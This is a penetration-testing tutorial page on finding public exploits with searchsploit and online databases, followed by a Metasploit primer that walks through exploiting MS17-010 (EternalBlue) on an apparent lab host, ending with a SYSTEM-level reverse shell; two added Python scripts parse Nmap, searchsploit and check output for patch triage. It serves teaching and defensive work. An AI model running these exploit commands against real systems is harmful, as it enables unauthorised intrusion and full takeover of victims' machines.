Public Exploits


  • Once we identify the services running on the ports found by our Nmap scan, the first step is to check whether any of those applications/services have public exploits.
  • Public exploits can be found for web applications as well as for other applications running on open ports, like SSH or FTP.

Finding Public Exploits

  • Google the application name together with the word “exploit” to see if we get any results, e.g. “windows 7 smb exploit”.
  • A well-known tool for this purpose is searchsploit, which we can use to search for public vulnerabilities/exploits for any application. We can install it with the following command:

sudo apt install exploitdb -y

  • Then, we can use searchsploit to search for a specific application by its name, as follows:

searchsploit openssh 7.2

  • We can also utilize online exploit databases to search for vulnerabilities, like Exploit DB, Rapid7 DB, or Vulnerability Lab.
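The workflow above (service and version from the Nmap scan, then a searchsploit query per service) is easy to automate when you are reviewing your own asset inventory for exposed software with known public exploits. The script below is an added example written for these notes, not the page's own or the exploitdb project's code. It assumes that `searchsploit -j <term>` prints a JSON object whose "RESULTS_EXPLOIT" list carries "Title", "EDB-ID" and "Path" keys (field names assumed from the exploitdb JSON layout); the Nmap XML fragment and the searchsploit JSON reply are constructed samples so that it runs offline, and the EDB-ID 00000 is a placeholder, not a real entry.

```python
"""Added example: map open services from an Nmap -sV scan to public exploit
entries returned by searchsploit, so a scan of our own hosts becomes a
patch-priority list.  Sample inputs are constructed; see the module docstring
assumptions in the comments below."""
import json
import re
import shutil
import subprocess
import xml.etree.ElementTree as ET

# Constructed Nmap -oX fragment: one host, two open fingerprinted ports and
# one closed port that must be ignored.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="10.10.10.40" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.2p2 Ubuntu 4ubuntu2.8"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="closed"/>
        <service name="http-proxy"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Constructed stand-in for the output of `searchsploit -j "OpenSSH 7.2"`.
# Field names are assumed from the exploitdb JSON layout; the entry itself and
# the EDB-ID 00000 are placeholders, not a real exploit record.
SAMPLE_SEARCHSPLOIT_JSON = json.dumps({
    "SEARCH": "OpenSSH 7.2",
    "RESULTS_EXPLOIT": [
        {"Title": "OpenSSH 7.2 - Placeholder Entry (constructed)", "EDB-ID": "00000",
         "Path": "/usr/share/exploitdb/exploits/linux/remote/00000.txt"},
    ],
    "RESULTS_SHELLCODE": [],
})


def open_services(nmap_xml):
    """Return (host, port, product, version) for each open port with -sV data."""
    found = []
    root = ET.fromstring(nmap_xml)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            if svc is None or not svc.get("product"):
                continue  # no fingerprint, nothing to search for
            found.append((addr, int(port.get("portid")),
                          svc.get("product"), svc.get("version", "")))
    return found


def search_term(product, version):
    """Build a short query like the notes' "openssh 7.2": product plus the
    leading major.minor of the version.  A full banner such as
    "7.2p2 Ubuntu 4ubuntu2.8" would match nothing verbatim."""
    m = re.match(r"\d+(?:\.\d+)?", version or "")
    return f"{product} {m.group(0)}" if m else product


def parse_searchsploit(json_text):
    """Reduce searchsploit -j output to (EDB-ID, Title, Path) tuples."""
    data = json.loads(json_text)
    return [(e.get("EDB-ID"), e.get("Title"), e.get("Path"))
            for e in data.get("RESULTS_EXPLOIT", [])]


def query_searchsploit(term):
    """Run the real tool when installed; otherwise use the constructed sample."""
    if shutil.which("searchsploit") is None:
        return SAMPLE_SEARCHSPLOIT_JSON
    proc = subprocess.run(["searchsploit", "-j", term],
                          capture_output=True, text=True, check=False)
    return proc.stdout


def triage(nmap_xml, lookup=query_searchsploit):
    """Map each open, fingerprinted service to the public exploit entries found."""
    report = {}
    for host, port, product, version in open_services(nmap_xml):
        term = search_term(product, version)
        report[f"{host}:{port}"] = {"term": term,
                                    "exploits": parse_searchsploit(lookup(term))}
    return report


if __name__ == "__main__":
    for service, info in triage(SAMPLE_NMAP_XML).items():
        print(service, info["term"], len(info["exploits"]), "entries")
```

Services whose list is non-empty are the ones to patch or isolate first; the `lookup` parameter exists so the parsing can be exercised against recorded JSON without the tool installed.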

Metasploit Primer

  • The Metasploit Framework (MSF) is an excellent tool for pentesters. It contains built-in exploits for many public vulnerabilities and provides an easy way to use these exploits against vulnerable targets.

  • MSF has many other features, like:

    • Running reconnaissance scripts to enumerate remote hosts and compromised targets
    • Verification scripts to test the existence of a vulnerability without actually compromising the target
    • Meterpreter, which is a great tool to connect to shells and run commands on the compromised targets
    • Many post-exploitation and pivoting tools
  • Let us take a basic example of searching for an exploit for an application we are attacking and how to exploit it. To run Metasploit, we can use the msfconsole command:

msfconsole

  • Once we have Metasploit running, we can search for our target application with the search exploit command. For example, we can search for the SMB vulnerability we identified previously:

search exploit eternalblue

Tip: Search can apply complex filters such as search cve:2009 type:exploit. See all the filters with help search

  • We found one exploit for this service. We can select it by copying its full name and passing it to the use command:

use exploit/windows/smb/ms17_010_psexec

  • Before we can run the exploit, we need to configure its options. To view the options available to configure, we can use the show options command.
  • Any option with Required set to yes needs to be set for the exploit to work. In this case, we only have two options to set: RHOSTS, which is the IP of our target (this can be one IP, multiple IPs, or a file containing a list of IPs), and LHOST, the address our payload connects back to. We can set them with the set command:

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40

msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0

  • Once we have both options set, we can start the exploitation. However, before we run the exploit, we can run a check to ensure the server is vulnerable:

check

[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
  • As we can see, the server is vulnerable. Note that not every exploit in the Metasploit Framework supports the check function. Finally, we can use the run or exploit command to run the exploit:
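When the check step above is run against more than one host (for example to confirm which machines still need the MS17-010 patch after a rollout), the console output is easier to act on as a per-host table. The parser below is an added example written for these notes, not Metasploit's own code. It assumes the lines have the shape of the notes' own check output ("[+] 10.10.10.40:445 - The target is vulnerable.") and that the verdict sentences are the standard Metasploit CheckCode messages; the first four sample lines are copied from the notes, the remaining lines for two further hosts are constructed.

```python
"""Added example: summarise the console output of a Metasploit `check` sweep
into a status per host:port, so verification runs can be recorded without
running the exploit itself.  Sample output lines are partly constructed."""
import re

# Lines 1-4 are the check output shown in the notes; the rest are constructed
# samples for two more hosts (a patched one and an unreachable one).
SAMPLE_CHECK_OUTPUT = """\
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.41:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 10.10.10.41:445       - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.10.41:445 - The target is not exploitable.
[*] 10.10.10.42:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.10.42:445 - Cannot reliably check exploitability.
"""

# "[sigil] host:port - message"; the sigil (*, +, -, !) is accepted but not
# relied on, since only the message text carries the verdict.
LINE_RE = re.compile(r"^\[([*+\-!])\]\s+(\S+?):(\d+)\s+-\s+(.*)$")

# Standard Metasploit CheckCode messages (assumed verbatim), mapped to a label.
VERDICTS = [
    ("The target is vulnerable.", "vulnerable"),
    ("The target appears to be vulnerable.", "appears_vulnerable"),
    ("The target is not exploitable.", "not_exploitable"),
    ("Cannot reliably check exploitability.", "unknown"),
]


def parse_check_output(text):
    """Return {"host:port": {"status": ..., "banner": ...}} from console output."""
    results = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _sigil, host, port, msg = m.groups()
        entry = results.setdefault(f"{host}:{port}",
                                   {"status": "unknown", "banner": None})
        for phrase, status in VERDICTS:
            if msg.startswith(phrase):
                entry["status"] = status
        # The scanner's "likely VULNERABLE" line carries the OS fingerprint
        # after a second " - "; keep it, it tells us which patch applies.
        if "VULNERABLE" in msg and " - " in msg:
            entry["banner"] = msg.split(" - ", 1)[1]
    return results


def hosts_needing_patch(results):
    """Sorted host:port keys whose check verdict was (likely) vulnerable."""
    return sorted(k for k, v in results.items()
                  if v["status"] in ("vulnerable", "appears_vulnerable"))


if __name__ == "__main__":
    parsed = parse_check_output(SAMPLE_CHECK_OUTPUT)
    for key, info in parsed.items():
        print(f"{key:20} {info['status']:18} {info['banner'] or ''}")
    print("needs patch:", hosts_needing_patch(parsed))
```

Hosts classified as "unknown" (unreachable, filtered, or a module that does not implement check) are the ones to follow up by other means rather than assume safe.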

exploit

Result:

C:\WINDOWS\system32>whoami

NT AUTHORITY\SYSTEM

  • As we can see, we have been able to gain admin access to the box and use the shell command to drop into an interactive shell.
  • These are basic examples of using Metasploit to exploit a vulnerability on a remote server.